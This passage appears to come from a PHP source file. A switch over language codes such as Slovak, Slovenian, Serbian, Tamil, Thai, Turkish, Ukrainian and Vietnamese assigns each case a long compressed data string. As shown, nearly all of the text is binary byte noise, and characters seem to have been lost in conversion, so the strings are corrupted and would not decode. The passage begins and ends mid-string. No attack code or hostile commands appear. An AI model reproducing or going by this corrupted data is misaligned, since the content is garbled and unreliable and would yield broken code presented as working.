5\0&Z0V(Z+^NBD+.q+`\$NDVEz(~@h+\$pE0xʏ#ܔ0HZP܍p/j*;0\$p<0fw}@C\"\\&%vBЇ\\dx0N\$'&\"YOMQuH\rhF4\"/M-Mb=C!QdQNk~[MT)\"q'FJnxp4I.Jt3L8j20m00bR\nbEcM`MX}\"N+R\\.pZG/\0qOZ.Z=rZPbR&R0* .셍y\$͠7*n\"%PNa\rdMjPn|5^I~Z2RPrT0C\$It˭O2m!\"gPM!G;*z> @4}@&%'pqa#'ސ!-&K.ťǓ|/r F㨟\$pRPe/E^6.NJ@֦S3S43P31#4ih.2EB%=p°fo\n>E.P6\0o0xa8 a#)#pJ6,Sq2C:S.QR-+qoXD^\rDMqP>c>Z>P]??`)@RI.b,nBbBLѤzAĨ=TE2^G8D0DuL\rq/ڴ4O5?q*ZT\$B0i<NGꅣ@AOdNϭ k0ϊm,xrsN=tGl>l}>;RO\nL͋1/L!NM*/3G;L@g%Dt\"2tN583RQLQkOO!KO(sSDQP,uJO%:!|r,(A\rVBBBع0@H+Ks7;N#X<\$3@tYZM1A\$Dњbx.Zw/'\\ZW4O\\/xC|PR]O7 1HJRXOAWWe84\$ASNA25<Mb[`Sa)akO:V (4ixf~a%!Z25cHcP{=bQ6@AfՔ%gV>Xyer`PUS0484PBffr#1Cft1@)kvR=?v-6A?k3܃oylg|!cy+Q5YQeoe/CA%mWgh@V@rkq֏AAϭ?9bֵ[\rqs²M9M0Y\n0Sv0 v|L0c()pWh\$wWaxJ1wUx<.%y{R9T҉7n&Og<evWoN,ev/}y*#VwӇws2Ӄ+!Wf5\n;;\"q#a)SeB+dr&Rllq*!\r3BMvQH/2\$M\nJ.p9e=y(1ǹt.ifъzCz&bK(kknJ]*K a\r\0l6{Tֵ1WjiTPgj065h6MXddtjrU\"43q8&O6kdͬT2,1Ddr#Ԯߒ2O8;GU+)&hjSm@ޢQ{Cby0Ì+ـ^3ޙ1=٣2tuPή:)IDh!Diew+W1MLl1dDJrz`Ҧy*erD6xe%L՜XyK4\rGŷin@ܷdEL%=VmRLrNm\$:vKhvvggμEe-5Zwp<:j";break;case"sk":$f="N0FP%(](a@n2\rC l7&P\rhl25rxdB\$r:\rFQ\0B18-9H0cAn8)D&sLb\nbM&}0a1g̤k02pQZ@_bԷ0 _0ɾh\rY83Nbp/ƃNbaaWwM\r+o;ICvM\nDb#&*0<P9P96JPʷ#@4Z9*2Ҹ\nC*Nc+<KdcYT<F!c`\"0K`9.(62I\ncʳs@PDlDP\$ۭ4b`9f*NL4lޜPx\$(C@:t/jȘ4\rӀ7X#/5A6 Đ7^0xA\$B65Ú)\"`%\"U9A\0Fb%X)Mf#CB~[۰J\0 Bv7c\\f\0ĂM{_zSZ;!á](\nP%ͶP\"քL9PC6:Pf10Us3;w|9@P2Az~V=(JXԖ>\"`* yg\reF)U!(@<dnxɽW3ذm-V\ren+pwTvtϾ#X'\r^@\0P<t8Cupf;Yeld:`3e&\$P`7/X<x:p9@.X^3+A_t@\"r3{`\ri@!b;DcDk#G=32ny *m\$!ٵ#4JSxO0HRh~C80WHpGa;5UÀic\0'@TP%ETrRKNaTqQ\$uRkVLI[+tcvJCbP놕>'H,D&ܜrR^K}3v8PNA g4_21BbH#El<gbSBDŽ~N4~笖b\"B?iJ<\0G@^x+!N%!\$<J4lam\r[,\0~OA XSڶII<@P L*,4倴8PNZ#RP@f.a[HMg X2wbF\n@gά%XxĮ\0PC=I0OȄ-DLc\$\0PO *\0BE5\"PkJ- 0f듕蒫J@FaY\0<c~\rS/\"_1dIк(cne͑gZIHDrnʽ\$+%P|{mnC]kJZ{9^=\"v\nbP\r-:G`cOU\"8+:HS\$uMawoHOP9%Ʌ_OP.CHzC\r#ؕc6AKfL/zg?`%b(wKA.K`L3cM\0<\"NYuŘ2TPa?\\Xzu\\_Ug5/֏Z?Z?kbqed׀(\rn\"G'FB2*^K@BH\roҠ2RA;T\"Ay^_fff\$IPJ+[t\nAACߵ1YN'O-`ӫ ̅Ef=;57\$.`SWHs+\"frĈT LԧO'{_M&7>in]۵ƌ=tcjY4MP[Y'J\"LlN#)ZU9:T:&`;y%#;OJ;/*Ac`LZTϢ, Ta42iFÖ*I(8xnwC eڀ&ב+G\0)ۯw!E )kdxWNӵ-yaxnoyiqXD\r%\rjRFS#LEH4\nrtx\$2X#~6.G,e^}6zEOs~O]Hc S]\$e|m|rR:N{q06;ڵsĕ]N*~o`1.>CBJD-Tثcp/FB`mb͏[\rծ\0ؐJۀjCϬ~lpȰty0AZ@smV&NDƠ\rEE,\n`CvWefD6%~EG&eA}\re%~V6PB'B6mE,(+)B\$l]Blnk%+0aLFĦ`nxoF\\qJo+|\\I(7~l<qz9p6i\n&.:q(c&t9qf.La>A bLŞF\"u b:IBcP̐LPS2ќO{&`\r+pOQ\0[e!(]o`sBJ`iFE J'/ APkТ`'2e\0N2o%'&4XRO'0arYPa Qhrz\\\"gRa.l)Oҧ+l\"W +*fR|K2\\dZwq>D,ҽP`K'Ks3/&\0#@<\"MIrD1z1ڤ̬_kzS³I\"\05BIK5n b@_d:\rJ4&d\"L!d'9B42\$B9b'76\rV\rg\rg:@.VZ8{\"l*:D:@2%0\nq#c)z%KMd-Y6\r@ʓkBDub**<#>gjv& X\nNFE^:f)#d`BB/rq\ntcS\nq^JF\$~ /It^S\$iI\r*lP6v2-C,zgboK~FV1MnLc\0'V4\rລ\$0găIE`*,3)J\n(t/ψŇ0RCT504V,s&g&o]U\ndIM9#sd1TFtвf\$%&N/Xk42f!N+g_(RMH\$9t! \0t @\n`";break;case"sl":$f="S:Dib#L&H%(6l7WƓ@d0\rY]0XI \r&y'̲%9JnnS鉆^ #!j6 !n7F9<lI/*LQZvccMQ3g#N\0e3Nb Pp@sNnbf.Pl5MBz67Q>gk53trρDы(P FSU8Fzi63iI2syO\nE.%k\rk8/)@8!#\n*!-Bj\nD87(9!1 #k^Ҡ.`<CPZEC@K4,)\0P֍H'(x(C@:t6Ѳ93Ø7xDDL2B5A6Z7^07C2C\nb o薁B5)L=h1-\"2i33#_4\"%{_I0Ԓۡo\"T6(+AP>+(2,#(셨м0bU#p122Cm\n:n\rj0'N\"4#lS˜.7*`e2ƅ{RPȃCYMjUi*Y.M꒫r;\r;@.KꐳWCK513Ҡ\$Tr\rXOǴc͂ >Q.0milꀅS˴ k!b=\0̍\r,D;\$֎|)&#UjX6*?#/S´D-\n^&Ø>(/^cH*cL4ڛӉna9't~P\n B@\\SQ=H⥔uOc:J!\$ l5ʕ( 7Q2kW\$\$Ȱ7vZ#OVIކE\\~Rw\n|ICA4'\0()\0d\rov)& q0&DFӰI >ȢxM{Q#|~QÚ\"aŒp}A?TaC6AC\n'`SS1Fh+3/Hv:Ί@'0-\rGak(rȏ%%9R*C9|`@` i8#\0M0T,OPfP94蕍&\rf:uCI`\$V3ju,V@y'843_SRFG)!G2PnJFk6PyVJ4F.4MKM䗤Bz1?8!fkmu5:q2a.U|Fϋ01:hd@wIP_XɽB`+('ҵPɚAhO8*4XzUFf\\1\"C@y)pc\0CXL:&bܽ[mh8=XD2n癹!7G|_.%\"|aa^.# AD`͙gJmU5{S/ɺA\nP 0\$ˀ3S\\\$g=#@8Rn{~&j:^Va0\rpJ0U}ouWd@d|9x\n=F\0eqTŘ\nՌqӸQ3i'cŸjGqK>5'vr?e=2H85(pg@:ie\\b;#,@nC2ZФS'J}3٬e=#_T}z\\45r.:.hpAT!QT'klP Q,-::K\nk(D|KA/7#v)M>1TZb.iL\\|\$dQz\"=صYȆ1){'|R墋^]̅F8IáH!ؿג_k8f.AaԕkȕsDXTN]ì@;SDa)hևNm:@OF.5*bШ hlC89m.u2fbN5O{{ ?[OL\\Ӹ.S{rΡSUg^C^/#BD0d FX_ =bKY(a{{~by^L҄<&>7pdd@%{~YWB;#ʾG\nr_u֭c\rX˩֞\$El0ZgAx\0@B\$n:#j+~((#h*B&X\$aF)O{bn.V]KTXFp>Ǻ.b/ľUz(o/ĸ\nBOoĪb>GUk%%PlRlʂ/\rc\r<8p P`P/mos\$bj˄\$bdo'/Zcd\$\0&`hpMg[\0k8GR- P~ j3lv#ꦪq\$q>1Gљ FQ;ѥ= pHǻ\$_bA\$n1< L/ijx/cb-%efqzX<P:<84!D*:4B9mDR<3L%RD\r,*%>P e\re''d2\"| *wX2nȨNX%.r CZ9%ɒk#Y^d^\rVm~^ɺub\\B6\npj>/䯰xL\$b(LF3)*@1,#4XzYd J| k/JFr\0xxgn#b8C80U\r*H&^\rl8n CBBgk7D<<Y\nR=MD'N>,=261 .JFK>`9:%\0c8e \nΦ'6\\,'T0d\$%|c;L\n`C@ ='\"FfRB0<C'\\d?f0|\\JHs#3gH˴#:jb";break;case"sr":$f="J44P-Ak @6\rh/`P\\33`hEC\\fLJⰦe_DehRƂhQ jQ*1a1CV9%9P u6ccUP/ABPb2as\$_TI0.\"uZH-0ՃAcYXZ5V\$Q4Yiqc9m:MQv2\ri;MS9 :q!:\r<˵ɫxbx>DqM|];ٴRTR)H3)Cmj\$?ƃF1ED48t%Ln58x&45-Jh%z)Ţ!I:۬е*H\"h\"|>r\\-ed]H\$H2)\\JjRHRI\$,_,Rն#LtU;iPX\$Tf|^@b1'e1+K!|5HuD)342Rs!fD<Y>x03:xg6C(\ru<:p4D6:X0XD #h卶|-#n(K1?KNbښB#\"0|Q@%Y1N8'16\\^.\r<` hy,54ʲI-M{VTɠH'ixZH¾Dk/@a#:6*IJC\"*5.ɺĪXNӎљ\$ b[\nC;V )BW 5AOYԙ.>i ;5Ya1IJk)!6pFcKf<j¬F@RxqYNŖ謥UNhyF=YIʴsiy1-%1SRxϑc (f,ĸ۩cl٣1KkV;S\$59vI\r3ŪZ8Qm8*WyqPpsͨs@9C\nI-@N(`BƑPA) Q. h2RKQEHGEK[\"\$!º!-n]2xkgE3IńKl Yk!ํz&uÑœ;Cp\r+2F~VX%e՞֊Z]l\n\\sԻ\ry/E_\00X;!㊵n_Eg]:,\"YGU *pDU! ߈qk3AiDHI#q&EPO1\rP@@P5W>cŋغL&\"~ZdleUW\$J34T{ٌ\0zD4C< QRb\$ޭ\"h#HC'6Cs;'l, d 7@e'en\0I;G<8DJOE(D&urPwHhXL1T,2}KGc%:3E ;geƼ!\rJ\0C8 aa2rV\0F\nIx0`ҽlՎ%pqTu:%2N_CقTd 8PTI2%dGPJ)W@-꽗Ǒ'xŊ\"._n\0!Rp+-D+̣&%*\".\$R'SvN\"g):a*ߚɅ\rt,h+HgqJlugD,AS¬B15c_mwKORLO#Wd`7cf8kR*\"JY\nAH2pkâ\rtړTX:dғ69-&i\$>DA\$Й:]j`Cru8E)g\\2@|)ʋ9Yk߮+9!; 49:`_+0{FSs:ʓZL\$qC\"N#\nyv5Reo|>AUbsҪnd8h!5K@P5)__oOY4`DHT!\$\nNt(XG7s.N-bM&uO/dduA\ri=Fu7\\iTR#MxXG\\8P\\`'[xeݝ>i\r;Yn?tMj@SM~Ւg1_SIB!jPE(u㈔zG7{I|/.2Eu;\nBaQV@H,wTd)ց\nw~A+ŀSÔlI,^N&B{V`)l4͏v.%ZU\"c\$2c=P&?.B:JxIMTL\$C.jjՄ*f(,|Np^ө?Pr./jH͐nֈB.ph0~VĂO.GM Pe\0lt\"0! ,zT#Xc:R\0(dql¤\"JŤZ'#V0B%ĩ,&'FP?K\"\$@zf=P>L30UncpǙHְQR&VpO'I\rplJ,kYt\ryp1q`Z-q1o\r g,^Ts@\">O&0deo+d1LQ&5dR&\0/ .߇Dˮ\"-*;\"qjjv2=r9϶#2A˪4RT\rO!,J*Hw4.*3>0NgMgbޅt14*~lG(q+M&H(JDfg Ҡr1j#\nэ'.rW\$R[\$\rCRtuP,D:.)FfeXGeRR0\$Sƍ`PMO02nDQY&b3<O3HY3Qs-|\n3NzM6LnJLH\nH\$sjbzCbpBH!s4q:QU!B;Q;w62{&<vJs=-bdḏS=)gg?.3SP{#0HǂfQ&h?:<GJ?B.2 )S;I>KJ٨\r733]Df'%(zQa3dB~XD~\$A᠆.tW #H\$t;n4Ib&T4|h@C.JJ`OJqn=D]DuHq-t#I3-dcL\r2e\$B@:r>S;+dZ\$\r)iTuH/sQo R\"u(UO\$[8CTOg}SГ>ZD;F\ni8^:dvVfM Pucp5NՉ=r% b(@\rV)=K4.~k(@VFI\r\npf\n@@1={ʒ,hN!Q\" *\"lԱ|%\0f \"[[;\\lL+,SԲվ\nwN1p| g֥`Ҡ>>Pc8!֧Xjc:6t܃)#L+`V-+.kWBlmj11}\n&0:2,uX c0\rejEp\r&\"5L?Ch^ A:ش@(30{=N@ \r4u⬯m }@le7n&tWslv>\rʝltl/Sq5#K\r\\GJ>jCQ\\'6b~*.`";break;case"ta":$f="W* iF\\Hd_+BQp 9t\\U@W(<\\@1 |@(:\r S.WAht]R&\\I`DJ\$:TϠX`*rj1k,Յz@%95|Udߠj䦸Cf4~Lgp:E5e&@.quW[\"+@m\0,-һ[&a;Dxr4&)s<!:\r?8\nRl[zR.<\n8N\"0AN*Åq` \no\072k,SD)Y,:҄)\rkf.b:C lJNr\$Ţ)20\nq\$&*A\$:SPzik\0ҏ9#xܣU-P J8\r,suYB.'E\\W\"u,ͱ(J!\n7\r/֑<-2W*{cQkRTP+C+c@٥+-V淺ԭn(6Tܭ2AOP)#6JZ*ʜW9<#\r7OTsb|\nhqC\nRRB̈́5|Bh3)ֶ1+%\\I5NBIpD!SG90z\r8a^\\^\rv<3Oó]#pKN]p|c7&\r/\"9n\r0nMr3^ClDaC)JVMs-Ee/Z02Rg;U=u%/wQ6\rsKD3 X7\$AM!AK=eqţe͔1pՎsoeAW{Y*\n#Q!6@@lݹ_QIL5Z`tO\nF i3vϴ#`#l@R\"5:\"WJd}PjbtX\\>w.CC¬E)=džiy踥9``lnG0QC)i+7P{qXqfY7i#wXֺ\"\"Y0HEwh^}6,?\")Z%6d1}sJ%Td*ђɺE=GX5a JyH ĸK<\nғh:x,5,D+yEë'^PY6,fQm)Vb\\ō1.OY49\0w[\r3py-rc\$(mo!ACc=3@@P:+`*(a+O(`01H6fL4v]^@D Ar8[?\$\0pvoDZdiLFЉ\ng6&rBf\"YrDJr@3[juEU/֪g-ڒhSyQ*4R\0\r,y;WCp\r-@2TڋSj]d͍vnmM@ݛzo56\\:wqA8ADYr qBA=M&짫u/PsAXW*DNP[ȚA(P:H\n\"3x},Na~`/רfY\"L*8a]TL(G='V |,?JYG^BQ KwErE8(y@=QQ)ajBL.88w(,\nDy/fQ'jڌA\$ iq1O\r@860r]` &hm 17!Op LkMndr?\rc TSqK2aVe\r!8S'NUKZ\n~3PSpa~~]\$fB(5-cV=<40yqWcA\\pBL2Vav<'@BD!P\"\n E 3{^26425iOs.)Uo*RoiוNW '{єH㛺Y0B!C2RBUEtm0AX=hu3>W?Zk!_jXP#3e\$ʣ-|<'٩,aϭt5=VuwM~z7qڀ*0D].Vn{2S6uX8%\$ :CuH2 ~#g&I`?::p0+N抷oA{{C Jp%Lfo=\n0=BJ 4i*ǃF\n4\nHo70\0\r \n`J\$=\"܀w槒y5ߌcp.@(',㨛pzXh˧&*xCH\$Nx2N6lʇtAPD& ʽ,Oh,gW\rzCO2.hibƨ@L_l\$M,}|No`|)fT|**fd̓.` \0@Ϧ\r#\n<`>JJYHlz})r#g0Cr}0E:@HNuny4:ͥ1\0Äu<eoAB\"\rmѲZdprЪlBu0\"hhYRB\0PHlbPq\rI\$»K#2N!20]gj0Ԩr>C'L\"#)rB0wʞOؐH'(bD\"*,ʆRr'QWI*r4c@t1\$@FtYE.\"sʞ*pKZh␚J)<hެC4β\"zRP34<Hd6m~cnf\n37BĢK+3KXFmr.PÀ|3z:W2S(%1:V3~I`k@W\nlC=2=q\"35ӵ=?S(N@,@i,!;RT{8-4C)?'\\8GGJRe*N i̾S4r)6Q?75=EPl4}3iI~qZ42AAGK\0 ,Z!Ѭ4Q;.f'JGD0+7BR/?3\r0R2>xCұD\"wu s49?4Q?AMKnJqS*4-?DpGaL?=ziFiXUQ=7X=;EYTPVXթWf/D\n*5i;t\\ Rfm;!OM[u9[O@q2qWeQu.Lf@=60N!^/!I7-\nnGY21b*m.ɩp@a^_Y4dc4![ҁRt6eRfU)Q[0]BI4iȃ'^3On8,a5eKtG~xCsC`u&daңGQbg5\r1\nA+2zkQ \$HO ;_\"Ek[ehi1q `BhG4 oS/pKcEg7BA1qeiSA\$7)9AUC%Wv/V\"[L`wiVhqBuAPY_UUlugWPI'Y5|!xGj`67v<'w]קAaMd'[h]i5~_~q[lWh13aWOvmx\$IOZ Ctv+[:IA`/8o+1sRrS5U/PW7ט1eza`u]`ŕ\"hZvr^uaXˋ|vÀ@-x#k\"8~_WX٭ߎq]%9x3JL&sb[)eWU_9@wwT9=|IUÖ.70pWxq9{V#SNQx>9K\\\nIə3+lYoswIj/8M%o-JC\rce,x!0jі{rٟvY)_gyʩeIYYס~AxF_~+4\nNE{XAU jGz_`cJrLrE\r11ZAET \0x@Qt^+Jef/7rm_)CWWrSMY]Z7\\\\A-:8QTwO4d-9}9+.,9\$0>tE\0<C]|w<z2q>xRSU;W,~Se60@Sm\ri2k\r\r ̢*+=c\rtĺM\nZ\0AmEOq)wJPݱ>p)먕ir!H+xqɖZaq(-VsאzTxѭ&g ;=̖GO]:9\0;_4 fYiuq ;ZtPwZ7@dVE(l>Hg 2Ah1ukț}TS>w<͞:x=^d8\"apz'ZzaVIn!\n=;`5\rч}RVoIO8V1:̽sF ]Z\0EĆ{ZffDNg%Ơu@\rhÊ'\nq1*C{<ˑeR'sP\nkwlT'=b5M?ZI~\"tZ9v7a4ξ9\$HI9.6\0 \0t @\n`";break;case"th":$f="\\! M@0tD\0 \nX:&\0*\n8\0 E30/\0ZB(^\0AK2\0&b8KGn I?J\\)b.)\\S\"s\0CWJ_6\\+eV6rJé5k]8@%994fv2 #!j65:i\\(zʳyW ej\0MLrS{q\0ק|\\Iq n[R|馛7;Z4 =j.Y7D 7i6LS0x4\r/0Oڶp\0@-pBP,JQpXD1jCb2α;\$3\$4<3/mJ'6Dڲ6@)[t+.~ s0/p#\rR'L[IΓʕEhD)1q7h\rl\n(E9*P>t\\8*/0Cܺ+*5Neķ Mh<)22<DA4Vl,5;,+dE;&id(UGT6;?IGwYi ZZrbžU6LV\nz9DSZ6bw60+;ĐFApY7Y\n^Ӄ,Eg+90z\r8a^h\\0lx2Ap9x7kC\n7cH߮Oì/5A6ۭ^0ԸAx@)\"`:y5]MӷDr۬\r6-YKQFIN3O]59uQM=cQ;}{rCp]ێ'q.s(҉{<\\\\Jb)SQU 'pZB&0`C*K!O SH'PlJZ*\"cF_\n(<YJ7*0v~+&=8hN\$\"zJ.(EWYb+خll40۠\0|&@cQeQ@V\\;(L\rZ0Lbኬ%Ęr6FPc`X4PJʉ#0!d8\n\nr>C3u.nIF1Jp!(Py@Y>pcw=7C\n̚BRq'\$\$D#n@?Al7`=r&eɍT\rC`1 \r3r3x'%pmH7T\n\n)qo#=- aL)bLr\0JHbxr-Β,mΥ5%4.YXFO*Qx*T)S͈7(*Qc n#(*X ʵf29x+404\n]aݫ0ihzCh{QjmUZal`ځl\r7&ݛzoa\rgş67[¨h'_UXQ~3uMJȩ@tc㪶>(|A@\$\0@\n@)PHR7(xx蕨a+\\RVh,vQ4EqhG?\n-fG2USpW4ʌBjI%ɊFI\$\0\\n784A@0\0xm-=sb0'eAf=%\\(ѨRWIUBekHR&xB|%~QgHPE{A*wZPfbٷ,E*U^>A3>#Kۜin]?dT=V,jI\"\".DB*ON&=\n, p \n@\"t&]Naǥ9b3pQdzp|E#X!wÁb9E%(nTҵ5t4xxPQ%X&K:-}E0Uk&/ю]v]DT Ƀ.,u:J=#l2iw}{`KdjmETũ)GdFen+JxHO\0.depW!]ٽAq.1ŇK/5E,Nef Ҩ9-H4pƁC\"W7\0*BIZw~Uʾ_]Pc=hDt\"J0ĸG aJ.~()Mv=|j|v+Wŕ!1 A]m)JN#מ9tDSw^]T|1ƪ1rC(J_3<q͂\",Lsژ*jg|~@!Bw&l¤5(}.[I\0^3DEdfZYrDP\0-HsN\0;yR.n<Qc1Ki'p,&+pI萄hxAl*DF\ncjG\0b}p\"Ĩ2e8D;9N%6OrFfRCA骄e_l`\nGMRcBP9C)TK̂~BQr.Ejej'@D00%j6v^._cEbC~BP\\fJ9E B*QpQN*Ђ J^Ж-G; \";PQHFDFlikqrii.quѽ/51D`1*)ho\$BP\rb\"&%-EQB:B쁄+g2B!-2H\rpQ9Џ!ko!Ϯy\"tD-\$SMa#g2C%EjE.z.N22)rnQ{\\hd*pwMҪ-C ¡G%2Ͼ,r+)~ғR[.I(\rN2G\0\$v\\`vc\rLD%ͦPb>%B2|MPJn#\0sG5315hrDJ\\g=2K0L-6Ha0d+XsdX[08#bg'C&RV2HtIN\nEE4|he _o<\$X .SDGO;6T,g77O\n/CW;\$ZbWPQT\nNM=.)C8!9\0ub7\\;a9J98oM pzVx\r0HJ6oHtE{ESEFtI W4tpwTJ27S%<{\r8T,x3IHG\$+:#hO\$)Nj\\wk91ON<%M/t6R`QRS LJvt82SE.3KAKԕ,:> @\0_UMJuZv hIVdlu~r\rwW&hVnB.{:hr0@֧OV#F2R][H[59uOM\\FD9VSE\\LST2@[uTaG2fu[ԓ\\YD9F/\\a\"+pYYG3Y /W F\n{]amTO^AUr_QIVgekbR`SE4_OWz>4Ai&\\rZ4MHI.`d1M)gukS521Fq/ek \n\r2HkK'1Ʉdz>I(Z\nkU7_\$gPR6RΧedDʸN\nk=A`t3{4hIoZmCR\rVnX\rl PCV3\$CZ+\0&tK8\nppDxxy4Wd+Jtu\00(%jn\rsBf ѭE|ß<\0g8א9Em@Ac\rxr8*CaЪ5*\$r2+ht.bKν` jNf=AfkT_;QawʠMBFO/O7!\$6'͇U-7(k8oEA?uk`@\rƤوxgdDdZEO.:+tSʶ-ؤz8R~8H<r5-zM&Or&q0DZQ|-\n`Cud)PBhVz^jJ'JJ8.eEE,c_Kp-BmLjvd8<2?i0-ňěsgirꜰIRs4GtMq8÷\"z \0t @\n`";break;case"tr":$f="E6M i=BQp 9 3!i6`'y\\\nb,P!= 2̑Ho<NXbn)̅'b):GX@\nFC1l7ASv*|%4F`(a1\r !^2Q|%O3vMA\\ 7\\e93a:sFNdp'tFK!vt @e#>ǜ㑄̠%%M :Ir?F 5 \"ih`ttꐄ2{:/B0Kt 4\r@\rPX9`*#z:AcJnV::01b\nB^-qJIƼ0A.4C(C@:t#\"7#rJ3<?H3L ˎྸXD #h&#x!@23L\nbTФ>NČ#|(490Kܼ\r¢2rQ>:='א'>qb<M0MpktĤ 3^\ra\09J0-.\n;-)5h2H\r}h249.:(+d0O9ϥ(od6꾏-\$4.4D>0@Po\\ؕO\$VVwayb<ˠR7QHbI(z_.ZN9B)u?Vw6Ey4Cx3CbNaױ, #pFCh1ac49q0e5C(P9)<IH0)H@58X6 \$nC(EqJOp!zf6<6/̘C/#JTϨ&5b<*8V a-%ļdL4&Szq\r:[|O\0007(%@nQJ1GRp3d aCq%퓰W&:l'e)pxQC.H<bBP @ux `\n)9?<¬\"שvG4<b,m a9 +{@&>@r#рH%PX' \$<,ҥRpњP@CU3\$Lla4>\\3/˸1aɱx%r\0¡#G{lJ\$ #Rːi*CgFM~(38oM2L.\\;R:JaaK&R)yfd\$H;\0U\n @DKO[<h};\nW &ZMJ)Pf,H=6\\4Q(8 fADu\rgR8äB2=\$@غtZlє@ʚy}R<r!)pI{Q<8loK3:iM\rSpQy5\nACܯ.h%ZtZ/SL9͑E{HH\n1](s],\"*,uK\nh8:HCc^ښ\$V<^d@o:aB@CWKsU)#ʹK(\"0pM_-ArӍCHL6AQGUv_<=Kѱ@ɫT!\$ RKĖ4R 9'\ni:d/*MIY9XdŨ<TE.,m&*I'%)ŗkz 18>ik6l3Xw'r\rlRNVv'0s,B9cs/C1\n}<저T@L,DR2F>`\"5\r)#Lpw\"2䊉jHJX|jd)QHlGD@R^ !Ei{Q6zlGd^(v `9nis\\iMAs66ӐU͡6XQ\"tt%iU[1u_v#w \$&5k[v:'í87nǷSOelUK3|'Yh?|X{d|.FE\nI|%V(7 4ky\"|)OϓL.S6D*G\"^膍{~H|m\\*i=Gl>r4ְX1eIANʄHџ,~%.Xژ9jνlV.\".U\n-PVn|mF.L!(X0Op\0\\[p,0D(p<dc&C4-2Fh~C-/6OC}U.\$*f)4.WW_ _pP\nE,nD>66/Ay\0=0NOW=`[PP \",\\Q\"1*\\1*p)CzCPD\$pGQ&#FPDB>j@S~-B%WK.9E-\0HԬ61E.,H6P6Y~U 4v\" ;@\",YObfLБLyOxgJ n=DdP\rVJ\"Y@ xVHl `\np7Rc(%>9%qNHrTmFLN&\$@\$6C\"6Hp)Ēr&Nk\"Z8<b|jt>1\\\$(be\nx:C\$Ԣb.\"滛r/ܡ|f.2B&+Jڹ&˜~\r'R~0 iB1B#!\0G1%hEϪz==24J4\ri,\n)/)2DOzp4S6:eMd{5ZlfIfjr\"n\"ޭů089*>iBJ#1P@";break;case"uk":$f="I4ɠh-`&KBQp 9 rh--}[ZH`RdbrbhdZGH\rMs6@Se+ȃE6JTdJsh\$g\$Gfj>Cf4jSdRB\rhSE6\rVG!TIV{ZLʔi%QBvUXhZ<,Aev4s)@tNC Ӑt4zC kK4\\L+U0\\F>kC5A2@\$M4TAJ\\GB4;!/(+`P{\\\r'TSX6VZ(\"I(L` ʱ\nf@\\.)D(SkZڱ-ꄗ.*bED~HMVF: E:fF(ɳ˚lG4'RdX#D#a+aP6JbSZ1DtJ4MM'N4Oj@#Q1*&GAC[%Nܦ\"GAC(C@:t# \\7C8^2\rØ7!0ޣ(p07\ra|\$6x!b\02:\nb4Z1|<ݦ)q-f\$ѠOĉI\rZY҄&7_irsi-Hٴvjn*\n'B^A3&̜eW\"@HΩ %)4oyfIZW%0`:YYkcW-K\\UEi1L撖|eDhFkUMmi>L:l! ]kAHR!Ak\nX3rF)JB7*6`o39x\\C^A#E11=8chOlRيi4!H\$Ѓ\$\nΆ3p*gZjx[IcPu(cfzV/hFFV\0*x9`QrGC0f\r5Zy\r,<\0CcgT9g*`o@9aXx0RZѻNi!/@RU\\A+LE&#+h X\"Vb&#l.Z*%GXL%FDF#\\푩G ei \"V5?&\rH&w̚;F@Cp\r+t2H\\Ks.b^z/e`\0F\n \r-\"ثc,m>Xa\rg!s(Uk\r.~QS!^\r4)XH,S6j(|JJJ(O1J\nQ)E8#FxP0m0|OnA ~4DW<KCȏ`)=nJ`Z\$BTc!\\oStf)!im<9.*9WdX'\$ id)˲0t8ɮ0r\rFf_\01ƖFu 2\$\$!MMMHOb61TK/2кEPeaGvW#\n¤[i_f#d[s&^%|/1 AA3J-9Am`0MEz9z+lm^'y!6̜u\$Me'&g[r%d `4HG2DFd2H,5-\$iJxP)\$^[үh_jJwx\nR+!m% pȃ,6n癁Eq\\ZhB(e^!ʂ) -o)Jv*@e6fgo?6o\0@Xi|FeK\0S{O\nQG֑YY \"U!t.fi#hپ}Rl=B΅0tL?,Bqt+5)D5\r.k{V@t(w\r\$h݉R4XҘBe\r;A2o(-A-\\܈Ц[[t/%8IKʶLy93CP陵ؽ NlIu*hw\">\"hKЛ!۰! R4* L<oc\$^;wC \0#V\r;ŋ^Tnb#lx<)N<SEj7ʋU际}m@DD4T8V{٨.>Ѯ{x>K-2KTB\0S1I?aVAV\0 ?)GjxFx|D\0p&\$T*!}f@OpF*5N].@#/fb\"Y\"FBp\\#b\$\n@\nyj= ZUUKphkZE
O?p(*Pd-v>CVM-D> xD/6iM͉.dp:jcH44mΩhErt#L\$\r\rZmcB\$|(1\"jhjƏ-mF9H&,jQD\$Lֈ.vzqZNFd6h%J\\Djh+Y\$'\$y})l#BNO#CLJ 0+QjlCn1{#FHqwXM(pBF\0Pl\$1(M%q;-E\r%@yNWFIOc\"*̰5#b&RM\"-/QBԎnv&W(elWSd҅BG*m\n1NB/Hr_O*1fRNȌG,.,r2̱DɈWMh2+% 2/&d!%'R(=3\") *ŲC234SN%3JDTʤ3d|ڪʈL®.V*%P'L,?\$6ki73m v_+.XRk2XB j2\nNn.R K3RP@iLZ0EG^zl)]6r\0\0G&0.t7s1\"M1㏹#RP)6RA?\rNZ44FA21N+E'(S7.|MPErԓ^ӦIt\\v%\0atUz`\$)胢O\r\0%ZRԢ~!.+nh4'2'DgK'Ҏi(a?Lt*Rԭ&SthXuhLhN\$ZtGCsM Pq ꒓9X.*Ϥt1WN.|AIE5/NTTTa&WT0<U=UJȰ4uPU5kT)/RsDs3LsnB҃6WjzXjnΦQ5GD\\bESTE]F_c[NZ4Usw]2m{DpRԒ+\nV\\54M5Ds3aee^CJ*JsD-\"JTB4jW1FP*8Rim 4-,_gp~V06Dc~n=jYp>?xg kɪ## cll]NQiWog)IiSg6AVE<@h\rV\raXk30ST;U,=VW'M\rNF9l.J(\npf>B\05\\7<̧\$X`-v2αwewO^}vׂBdZwG u`\$&E7BSD=9)an5e~Imracr0i2qfp)&<Hj \$#c9<֩0>RŢzG75r1\$6i=\"GqS-]SP4G?d3W7)?Zx5M*IIBVAq\$>dfQoC4:#APg\0Srza\nLcԼkhK+Gt-5q&*.@\n`̘}L0}գ5L\\7NCG1\n>\r##1dPBSRg&*5ӈ*_4f@";break;case"vi":$f="Bp& *(J.0Q,Z)v@Tf\npjp*VC`]rY<#\$b\$L2@%9IΓ4˅d3\rFqt9N1QE3ڡhj[J;o\n(UbdaI¾RiD\0\0A)X8@q:g!C_#y̸6:ڋ.K;.inE{\rB\n'_2ka!W&Asv6'HƻvOIvLØ:J8楩Bakj!pK(0N)b()7&hb,+]/P!\0Pk<H\n3|/\"1'\0\0PR!1d2V#IpN& Z) 